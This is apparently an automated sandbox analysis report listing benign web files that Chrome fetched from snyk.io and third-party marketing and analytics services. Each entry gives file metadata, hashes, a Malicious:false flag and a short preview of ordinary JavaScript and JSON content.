                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):68076
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.253482511347538
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:bx5P+lx5LhQk+9dSwgx+DFF3rUMFWgqKh20zK5wd:bnmz5LhQk+9d6xwWP0u5+
                                                                                                                                                                                                                                                                                                              MD5:49CE5445DDCF5D24EF3BADC4EB1A11DD
                                                                                                                                                                                                                                                                                                              SHA1:DBE8CF782A53824BAC569AA3EA42992DD21064D6
                                                                                                                                                                                                                                                                                                              SHA-256:D70FA5DC6C8BFE9D7824BE31E669528533D0879A2B1600A7DF68B880F4D44296
                                                                                                                                                                                                                                                                                                              SHA-512:A720C00082E803A92EF54A1829BC845B187CD4544F5B202BC98F234A4FC9401EE76B21F8CB21E4C93F88B8DD8AA63D93A03DFF5A39570DA19EB6D105FFEC6683
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/26.04e7f30b.chunk.js
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[26],{"8Sys":function(e,t,n){"use strict";n.d(t,"a",function(){return r}),n.d(t,"b",function(){return o});var r,o,i="undefined"!==typeof performance&&performance,a=i&&i.now?function(){return i.now()}:function(){return Date.now()};function throwIfEmpty(e){if(!e)throw new Error("name must be non-empty")}if(i&&i.mark)r=function mark(e){throwIfEmpty(e),i.mark("start "+e)},o=function stop(e){throwIfEmpty(e),i.mark("end "+e),i.measure(e,"start "+e,"end "+e);var t=i.getEntriesByName(e);return t[t.length-1]},function getEntries(){return i.getEntriesByType("measure")},function clear(){i.clearMarks(),i.clearMeasures()};else{var s={},c=[];r=function mark(e){throwIfEmpty(e);var t=a();s["$"+e]=t},o=function stop(e){throwIfEmpty(e);var t=a(),n=s["$"+e];if(!n)throw new Error("no known mark: "+e);var r={startTime:n,name:e,duration:t-n,entryType:"measure"};return function insertSorted(e,t){for(var n,r=0,o=e.length;r<o;)e[n=r+o>>>1].startTime<t.startTi
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (18122)
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):240139
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.520225430933383
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3072:/IfEnRhbIGc3kWhF1ZF0cSncEjCPfrgiA4as3rOXk9nObg4:TRo3k4TCJviKs3qXk9nOb7
                                                                                                                                                                                                                                                                                                              MD5:3BD433563F5837C652D4A7DD37F046F9
                                                                                                                                                                                                                                                                                                              SHA1:ED2D37343B5EFEEC642D214C549E421330F4E9AE
                                                                                                                                                                                                                                                                                                              SHA-256:4D6F3E261043031365AE14811363456201DEAB9BFA5369B18702B2B1E6A32D6B
                                                                                                                                                                                                                                                                                                              SHA-512:04B6736456DC017F8A9E6127FA46F98EB1A3A463BCB490467AD9D90689B98101B5ECFF5A078A54406D927D32CF1290667314ED902CF97DA7F25A7AA290D9EF95
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtm.js?id=GTM-T8QMQW9&l=dataLayer
                                                                                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"28",. . "macros":[{"function":"__e"},{"function":"__e"},{"function":"__c","vtp_value":"G-X9SH3KP7B4"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"category_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_location"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"cta_type"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"link_url"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"outbound"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"subcategory_name"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"newsletter_name"},{"function":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (50704), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):50718
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.133671543409582
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:fzyzw/eXRDiastciudceNTRD/MiEMVvpxl+fm9re9PE8waMe:fzyzw/eXRDiastciMc6D/MCXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:7CC2246F925A9EE4E3007D860E1B1094
                                                                                                                                                                                                                                                                                                              SHA1:5C47975C53F100C87B002219A19A2B04725ED0E2
                                                                                                                                                                                                                                                                                                              SHA-256:700A69456DCACCF3088F0E72AA112866AF186E062955C1BB066295BBED5F4502
                                                                                                                                                                                                                                                                                                              SHA-512:30972C8CE6063F511FC1F1A654000B28B740DEA44C57C209C6F32DDE5855ECBE5670C5AABA8D67D35A003462CF18CC5A7297A2FEF4EFE621B9F1DA750A98A7A9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/contact-us.json?slug=contact-us
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4IUtppRPSmdrRQGTPEBkMl","type":"Entry","createdAt":"2022-11-22T20:03:08.041Z","updatedAt":"2023-09-22T17:15:45.765Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":28,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Conversion page - Contact us","title":"Contact us | Snyk","slug":"contact-us","uri":"contact-us","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"1fYnA1RNg17Mz5O1wwKpFP","type":"Entry","createdAt":"2022-11-22T18:28:19.569Z","updatedAt":"2023-08-17T01:26:30.785Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":24,
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (4013), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4013
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.411543312033906
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:48:ibj7sUMJyVLWT20arkNs7L9XbzWRfiuLiYcNjedk/sxw2Mm7tIxWeYv3Tlqdf:mUUqT4rr7ZrzWRDiYTdk/IwoTeK3TYf
                                                                                                                                                                                                                                                                                                              MD5:66D50B1D2D2A265FD6B251874161A48C
                                                                                                                                                                                                                                                                                                              SHA1:AAD3BABB3B7078689ABB5B7525F7E811FB0F0AD7
                                                                                                                                                                                                                                                                                                              SHA-256:7BFCCFED1DD96FA73C1B58DCABEBAE7A4BB97900965B28A90BE8AFA6D70BFC7B
                                                                                                                                                                                                                                                                                                              SHA-512:D6382155BC9DC452FD7059D7F1BE5238C40F8CEF0F804FA4815082118AE9AF20C614F6873E782779B13A1081C81960A400ED6EF9FEF0DA7C2CBD47591CF1C714
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[1025],{8241:function(e,l,a){a.d(l,{d:function(){return t},x:function(){return n}});let n=function(e){let l=arguments.length>1&&void 0!==arguments[1]?arguments[1]:5,a=1;switch(!0){case e>0&&e<l:a=e;break;case e>=l:a=l;break;case l>=12:a=12}return a},t=e=>{let l={hasMaxWidth:!1,itemPadding:"extra-large",gap:"extra-large"};switch(!0){case e<=2:l.hasMaxWidth=!0;break;case 4===e:l.itemPadding="medium",l.gap="medium";break;case e>4:l.itemPadding="medium",l.gap="small"}return l}},41828:function(e,l,a){var n=a(85893),t=a(5152),d=a.n(t),i=a(45697),o=a.n(i),r=a(9981),s=a(23751);let c=d()(()=>a.e(3901).then(a.bind(a,43901)),{loadableGenerated:{webpack:()=>[43901]}}),u=d()(()=>Promise.all([a.e(3259),a.e(2562)]).then(a.bind(a,2562)),{loadableGenerated:{webpack:()=>[2562]}}),b=d()(()=>a.e(8578).then(a.bind(a,78578)),{loadableGenerated:{webpack:()=>[78578]}}),m=d()(()=>Promise.all([a.e(3259),a.e(9384)]).then(a.bind(a,79384)),{loada
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (20263), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20263
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.02253476059854
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:ouMyZYARLGBsQ4QYo9GCTaeU+fnodEJ8gSL/8QDg/G8:SyZ/VQYo9GCT2h98
                                                                                                                                                                                                                                                                                                              MD5:153FAAB96A3B0A5E374E9194EA602774
                                                                                                                                                                                                                                                                                                              SHA1:100C8CB5C13E24B6546CF865F8B1D5CC4A4D8FE6
                                                                                                                                                                                                                                                                                                              SHA-256:E76F88C64A31B786668554F6951EE961DD53F292099D486F2A7379F0B73EAEDE
                                                                                                                                                                                                                                                                                                              SHA-512:7DD5A061384CBA7D59B61B08B560952A369E9CFB9AA378CE5527EF1083D8C67FC0F26B6D7FD05E71DFC26223552530C18D0C3307A7461F88EFCB290473BDE64F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:jQuery37105299860925787463_1729799371942({"Id":2940,"Vid":2940,"Status":"approved","Name":"Website Demo Request Form","Description":"","Layout":"above","GutterWidth":10,"OffsetWidth":10,"HasTwoButtons":true,"SubmitLabel":"Let's talk","ResetLabel":"Clear","ButtonLocation":"120","LabelWidth":100,"FieldWidth":150,"ToolTipType":"none","FontFamily":"Helvetica, Arial, sans-serif","FontSize":"13px","FontColor":"#333","FontUrl":null,"LineMargin":10,"ProcessorVersion":2,"CreatedByUserid":3421,"ProcessOptions":{"language":"English","locale":"en_GB","profiling":{"isEnabled":true,"numberOfProfilingFields":8,"alwaysShowFields":[]},"socialSignOn":{"isEnabled":false,"enabledNetworks":[],"cfId":null,"codeSnippet":null}},"EnableDeferredMode":0,"EnableCaptcha":0,"EnableGlobalFormValidationRule":1,"ButtonType":null,"ButtonImageUrl":null,"ButtonText":null,"ButtonSubmissionText":"Please Wait","ButtonStyle":{"id":11,"className":"mktoSimple","css":".mktoForm .mktoButtonWrap.mktoSimple .mktoButton {\ncolor:#f
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):752
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.590854938461462
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12:YGKvxaNmUjHfH9dNpH5xM/h/bEpUAxaNmr219rHfHKz8okewRx873rLdtxlFcnGz:Yd4NdHfjHQJBNhrHf0lYG7Ldz3cGz
                                                                                                                                                                                                                                                                                                              MD5:DA92A9E7F42FF417E488EE373B5BDD04
                                                                                                                                                                                                                                                                                                              SHA1:9D6B3ED1B17FA65085E5DA4CBF378A9F8E43A9B5
                                                                                                                                                                                                                                                                                                              SHA-256:1E7DEB491549EF8979ACA20E9203280C72C6883BDE204069A439DE5CBA1D2972
                                                                                                                                                                                                                                                                                                              SHA-512:0D7C0D690171A7FD6E7FD08FD1DC82835A17DAB68A49767EAB644F54A7C2DA2928DEFD9B75A322ED5797FC5821C9EECC1AFF3BF241C3EBAAB1D5AE7D69794981
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://eps.6sc.co/v3/company/details
                                                                                                                                                                                                                                                                                                              Preview:{"company":{"domain":"","name":"","region":"","country":"United States","state":"Texas","city":"Killeen","industry":"","companyId":"","country_iso_code":"US","address":"","zip":"","phone":"","employee_range":"","revenue_range":"","employee_count":"","annual_revenue":"","is_blacklisted":false,"state_code":"","is_6qa":false,"geoIP_country":"United States","geoIP_state":"Texas","geoIP_city":"Killeen","company_match":"Non-actionable Match","additional_comment":"There is no valid B2B use case as this was matched to something other than a company name/domain (i.e. bot, host, noisy signal, etc.)","sic":"","sic_description":"","naics":"","naics_description":"","industry_v2":[]},"scores":[],"segments":{"ids":[],"names":[],"list":[]},"confidence":"NA"}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (7215), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):7215
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.715038918631035
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:XFP79r8FRHF6U/Atg28bngH1nlm6AVPhJ98evibOEOxWShjulmu/TuVH5coKW8A0:p7VfnzeuN/Tk4
                                                                                                                                                                                                                                                                                                              MD5:1C6A1D59A85DC5CC5C7E07197599E9CE
                                                                                                                                                                                                                                                                                                              SHA1:C0E9404A317D60811E5190607D9F74073B9F9CC6
                                                                                                                                                                                                                                                                                                              SHA-256:DBEBA2B031E84A4C7100F7E8F2FE7284C9D296FA1BD2861889F86DF1D708B7B1
                                                                                                                                                                                                                                                                                                              SHA-512:84FBDD8171E910EFA566A3750DA726206EE3BA1AD4BD3F7BD8EF0A6AB52FA86A994D6EE94209F787E88EB6219C1FBE3B7E806E785E8D944525A06BB44D74CBA3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/main~493df0b3.8510c064.chunk.js
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[5],{"/7QA":function(t,i,E){"use strict";E.r(i),"production"!==E("LeJ0").a.ENV&&E("Cp41");var A=E("9EWH"),_=E("ADGC");Object(_.b)()&&Object(A.b)();!function polyfillKickoff(t){try{[1].includes(1)&&t()}catch(i){Promise.all([E.e(49).then(E.t.bind(null,"imET",7)),Promise.all([E.e(2),E.e(40)]).then(E.t.bind(null,"H+SE",7)),E.e(15).then(E.t.bind(null,"2GZm",7)),Promise.all([E.e(2),E.e(12),E.e(7)]).then(E.t.bind(null,"LSZE",7)),E.e(54).then(E.t.bind(null,"3yYM",7))]).then(function(){t()}).catch(function(t){return console.error("Error importing polyfills",t)})}}(function kickOff(){Promise.all([E.e(52),E.e(37),E.e(22),E.e(19),E.e(43),E.e(20),E.e(26),E.e(14),E.e(11),E.e(18),E.e(50),E.e(42),E.e(29),E.e(21),E.e(8),E.e(16),E.e(24),E.e(17)]).then(E.bind(null,"V+70")).catch(function(t){return console.warn("loading root widget failed",t)})})},0:function(t,i,E){t.exports=E("/7QA")},"91+0":function(t){t.exports={"//WS_CHAT_BASE":"localhost:4000",ENV:"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65506), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):72690
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.115936100793728
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:/RhRMkrKdJlA0Oy0AbB/Gsi7HEMVvpxl+fm9re9PE8waMe:5hOoq3OyvB/Gs8Xr9faMe
                                                                                                                                                                                                                                                                                                              MD5:1F5568738962474D607CB5E26E825A20
                                                                                                                                                                                                                                                                                                              SHA1:E0FFAB73C422CC3E3E3FA8FCAFCC887D834B31BD
                                                                                                                                                                                                                                                                                                              SHA-256:5E9709E8FB37EA23F5A34CBB0EC35FA6C5702804BD498B0589F08577E04B9D33
                                                                                                                                                                                                                                                                                                              SHA-512:9B07FEC22D3D2E5654483B2153BBE2DA3FC8DDB89172F2BEED7A09FDE9D0ED76858EEDE86AC19B415F44B458DC04D33CE6BE445CDB551D4AAC2F38B6893F4602
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/product.json?slug=product
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"7uibDFYTy0Em4tJh3ERCMI","type":"Entry","createdAt":"2022-12-12T22:31:29.545Z","updatedAt":"2023-09-22T18:09:20.596Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":46,"revision":15,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"What is Snyk? - Developer Security Platform page","title":"What is Snyk?","slug":"what-is-snyk","uri":"product","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"1sjy4giKCtd2J8hY2rEKXo","type":"Entry","createdAt":"2022-12-13T17:28:55.075Z","updatedAt":"2023-09-20T22:00:53.119Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publi
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5570), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):5570
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.174184165878395
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:PPRAmpRUK5r843P4QEYxI2oWafiPHrnKnRaORlsUN:XampRUK5r8kPFEYxI2RayHrnKRauf
                                                                                                                                                                                                                                                                                                              MD5:B6BEDD960AE2867F2B15B2788B9416AC
                                                                                                                                                                                                                                                                                                              SHA1:90ADB5AE82DE7C32136972771ADDD17ADE04AF43
                                                                                                                                                                                                                                                                                                              SHA-256:F07F71A0219944B65EE2A50C34379780A3653A04934FAD49C22B34141BCA52D5
                                                                                                                                                                                                                                                                                                              SHA-512:3ADA0685EEF62587CF019FC03C6E844EAD4C2E25E96E7B89449F5F1E64FD1473339ED5828337F43D2A092E6BE2841199C99A7EBDE3E28B81F7F69815B239C447
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:jsonp769920([{"id":115023,"orchestrationId":null,"streamId":null,"viewModelId":"172a0938-17e7-478a-a033-fc87db145d08","typeId":0,"triggers":["exit_intent"],"visibilityType":2,"groupId":null,"groupConfig":null,"contentPoolId":null,"recommendUrlParams":null,"renderMode":0,"inAbTestForVisitor":false,"displayFrequency":{"displayAgain":{"frequency":3}},"postCompletionScript":"","customImpressionTrackingCode":null,"customClickTrackingCode":null,"name":"On-Exit Popup - On-Demand Demo - on Demo page","unitSettings":{"param":{"backgroundColor":"#fff","textColor":"#322e3e","secondaryTextColor":"#7348fe","buttonBackgroundColor":"#7348fe","buttonTextColor":"#efeaff","carouselIndicatorColor":null,"scroll_depth":null},"css":"#trd_cta_{{ID}}.{{VISIBILITY}} .container-elements {\n\tflex-direction: row !important;\n\tjustify-items: center !important;\n\talign-items: center !important;\n\tbackground: #ffffff !important;\n\tborder-radius: 12px !important;\n\tpadding: 24px !important;\n}\n\n#trd_cta_{{ID}
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65510), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):196588
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.091502967928007
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:4UIXwRvCDvm2RN5tB2A9AZDIWacOH2/4QFnOaowmeRJF7ZNuuy:4UIEvWmwxr9UOW/jST
                                                                                                                                                                                                                                                                                                              MD5:A392F81A5F1CCB656FF0F6ADBFD34C74
                                                                                                                                                                                                                                                                                                              SHA1:A11E0EF072C0F352719D5B376D6434DC990E35A0
                                                                                                                                                                                                                                                                                                              SHA-256:8A4D9210E6B9BA14859C361F9E9F524BBA90EE12B643617D612BCE86FE965EB5
                                                                                                                                                                                                                                                                                                              SHA-512:ECC84E100E53792B1E3E36FB8AD84DD40BEBADBC99CB2C803DB5B250490A6897D4514D27923962B920FC28A2C20FF5E52C212A8B8A4D0DBD142F6ED84F3510E5
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3BJotqXTilNzoXGPZsO5g0","type":"Entry","createdAt":"2023-10-10T23:22:07.462Z","updatedAt":"2024-07-18T21:34:04.740Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":24,"revision":5,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"\"Zero day vuln\" Solutions page","title":"Find and Fix Zero-Day Vulns Fast with Snyk","slug":"find-and-fix-zero-day-vulns-fast-with-snyk","uri":"solutions/zero-day-vulnerability-security","pageLocalization":["fr","ja","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3rndEz4wQEiouChUCrwcNV","type":"Entry","createdAt":"2023-10-10T23:22:07.595Z","updatedAt":"2024-07-18T21:34:04.959Z","enviro
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65531), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):76676
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.13726611752675
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:hHCpu9A4/1236nD36YD36JTzZI0Y37tts1j+CWSxFxrjJkF1EMVvpxl+fm9re9P3:hHZS4/1a6nz6Yz67Ik1dWIkF5Xr9faMe
                                                                                                                                                                                                                                                                                                              MD5:768A6856ED55B4CF6B0627BF177BF4D3
                                                                                                                                                                                                                                                                                                              SHA1:692416653C9791D7CFFB62B26B544B200DF570B6
                                                                                                                                                                                                                                                                                                              SHA-256:183DCC30375EABFE0C2152B5AE73587E7CC10575944910F0FA8493427CF27D76
                                                                                                                                                                                                                                                                                                              SHA-512:8ECF387ACA3296CF331CDD07493BDE35236D160E70573F82541CC4E7CED48BB75DE40CD51CDDEEFE00DC224597ABFAB3BB8D1CAEB2933B345DD1634B21E1A765
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2i6WdLdRYeDA5iO4KJAKMb","type":"Entry","createdAt":"2022-10-21T05:28:23.507Z","updatedAt":"2024-07-26T13:15:53.911Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":73,"revision":12,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Products - Snyk IaC","title":"Infrastructure as Code Security | IaC Security | Snyk","slug":"infrastructure-as-code-security","uri":"product/infrastructure-as-code-security","pageLocalization":["de","fr","ja","pt-BR"],"contentTags":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"4pFhP7cfzo00Fs1PADSIHP","type":"Entry","createdAt":"2022-10-21T05:28:23.622Z","updatedAt":"2023-05-25T20:47:43.455Z","environment":{"sys":{"id"
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9887), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):9887
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.324944220647428
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:VrPahIxyyGGtu4BvGcm0j9Ha24gKBKbRSf:CIxyyvtup69HabZf
                                                                                                                                                                                                                                                                                                              MD5:7DF67DDE87FA6D7CF73573588D4BCB3D
                                                                                                                                                                                                                                                                                                              SHA1:34F60FEC284A05D70B773872DE50C9B00CBD638E
                                                                                                                                                                                                                                                                                                              SHA-256:DE02755097ED5302499104CDDE5E20F359B2FF96162997730DF39A942A8B44E8
                                                                                                                                                                                                                                                                                                              SHA-512:CF55C057432DCAD1A1988CC4FEE129C5DD27E2AC0B68E2FD97E7ECC16AC847F27284DB5EF30C1323820250863803EE33B23E5C69EF0F2216124A4712BF51C0FF
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/static/chunks/5030.3b020cf8ffddffa3.js
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[5030],{65840:function(e,t,a){a.d(t,{Z:function(){return u}});var o=a(85893),r=a(45697),i=a.n(r),n=a(64119),s=a(15020),l=a(6215),c=a(44133);function d(e){var t,a;let{colorScheme:r,className:i}=e;return(0,o.jsx)("div",{className:(0,c.Z)("d-flex items-center justify-center radius-full w-medium h-medium",r&&"bg-".concat(null===(t=l.k[r])||void 0===t?void 0:t.miniHeader,"-opal-1")),"data-component":"Feature Checkmark",children:(0,o.jsx)("div",{className:(0,c.Z)("d-flex",i,r&&"txt-".concat(null===(a=l.k[r])||void 0===a?void 0:a.miniHeader)),children:(0,o.jsx)(n.Z,{name:"check",size:"md",className:"scale-8"})})})}d.propTypes={colorScheme:i().oneOf(["",...s.ZP]),className:i().string};var u=d},86604:function(e,t,a){a.d(t,{Z:function(){return s}});var o=a(85893),r=a(45697),i=a.n(r);function n(e){let{children:t,className:a}=e;return(0,o.jsx)("figure",{className:a,"data-component":"Media Asset Container",children:t})}n.propTypes
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65517), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):78852
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.17156068477932
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:URqY9Z2oY7yAfTTp5LbUPhy4wwObrsEEMVvpxl+fm9re9PE8waMe:xe/Y7yAfTP30waYXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:E99B4DB9B9EE7D88A4F3499CDCCFB68A
                                                                                                                                                                                                                                                                                                              SHA1:FBAAA08EBB1179EE35C1CA7D72FE621CBB576F7A
